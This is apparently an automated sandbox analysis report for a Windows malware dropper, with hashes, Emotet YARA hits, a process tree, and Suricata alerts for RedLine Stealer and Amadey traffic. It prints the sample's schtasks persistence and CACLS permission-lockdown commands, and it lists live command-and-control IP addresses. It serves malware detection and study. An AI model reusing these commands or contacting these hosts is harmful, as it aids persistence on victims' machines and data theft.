Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 13, 2023, 8:28 a.m.	June 13, 2023, 8:31 a.m.

Size	780.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`1b005ef861fb3ff7c09d89c3f752d62f`
SHA256	`9c88438a538eaf624ff431afe40c359b17601c39258948320e9884195388857e`
CRC32	`EA0B93EC`
ssdeep	`12288:cMrdy90tCvN4ZJTA1VqiSCmW0FOrAEYyxrdHYLdPfo3hUmTINShMafRLKH8ai:ByZN4ZJUyiVZNxRHUwHRU8P`
PDB Path	wextract.pdb
Yara	UPX_Zero - UPX packed file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet IsPE32 - (no description)

photo912.exe "C:\Users\test22\AppData\Local\Temp\photo912.exe"
660
- v6329954.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v6329954.exe
  1488
  - v2133053.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v2133053.exe
    2104
    - v2696155.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\v2696155.exe
      2164
      - a9421387.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\a9421387.exe
        2216
      - b9632235.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\b9632235.exe
        2712
    - c4167888.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\c4167888.exe
      2884
  - d4904288.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\d4904288.exe
    3040
    - lamod.exe "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe"
      2156
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
        2612
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "lamod.exe" /P "test22:N"&&CACLS "lamod.exe" /P "test22:R" /E&&echo Y|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit
        2352
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        1800
        
        cacls.exe CACLS "lamod.exe" /P "test22:N"
        1072
        
        cacls.exe CACLS "lamod.exe" /P "test22:R" /E
        2328
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2900
        
        cacls.exe CACLS "..\a9e2a16078" /P "test22:N"
        2992
        
        cacls.exe CACLS "..\a9e2a16078" /P "test22:R" /E
        2944
      - foto164.exe "C:\Users\test22\AppData\Local\Temp\1000007051\foto164.exe"
        2184
        
        x6558453.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x6558453.exe
        1440
        
        x9212526.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x9212526.exe
        2428
        
        f6979804.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\f6979804.exe
        2220
        
        g0104781.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\g0104781.exe
        2152
        
        h8741057.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h8741057.exe
        1804
        
        i2742322.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\i2742322.exe
        2880
      - fotod75.exe "C:\Users\test22\AppData\Local\Temp\1000008051\fotod75.exe"
        2780
        
        y9697386.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\y9697386.exe
        2976
        
        y8949096.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\y8949096.exe
        2940
        
        y5450570.exe C:\Users\test22\AppData\Local\Temp\IXP006.TMP\y5450570.exe
        1676
        
        j5374024.exe C:\Users\test22\AppData\Local\Temp\IXP007.TMP\j5374024.exe
        2856
        
        k5556685.exe C:\Users\test22\AppData\Local\Temp\IXP007.TMP\k5556685.exe
        2304
        
        l0309674.exe C:\Users\test22\AppData\Local\Temp\IXP006.TMP\l0309674.exe
        2708
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        3004
- e7254436.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\e7254436.exe
  2228
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
77.91.68.30	Active	Moloch
83.97.73.129	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 83.97.73.129:19068 -> 192.168.56.103:49166	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 83.97.73.129:19068 -> 192.168.56.103:49175	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 83.97.73.129:19068 -> 192.168.56.103:49170	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 83.97.73.129:19068 -> 192.168.56.103:49170	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 83.97.73.129:19068 -> 192.168.56.103:49189	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.30:80 -> 192.168.56.103:49184	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.30:80 -> 192.168.56.103:49184	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.30:80 -> 192.168.56.103:49184	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.68.30:80 -> 192.168.56.103:49184	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.30:80 -> 192.168.56.103:49184	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 83.97.73.129:19068 -> 192.168.56.103:49199	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 83.97.73.129:19068	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 77.91.68.30:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 61 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 8:30 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (21 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 13, 2023, 8:28 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:28 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:22 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:22 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:22 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:22 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:29 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:30 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:30 a.m.			0	0
IsDebuggerPresent June 13, 2023, 8:30 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 13, 2023, 8:29 a.m.	buffer: SUCCESS: The scheduled task "lamod.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 13, 2023, 8:29 a.m.	buffer: e console_handle: 0x00000007	1	1
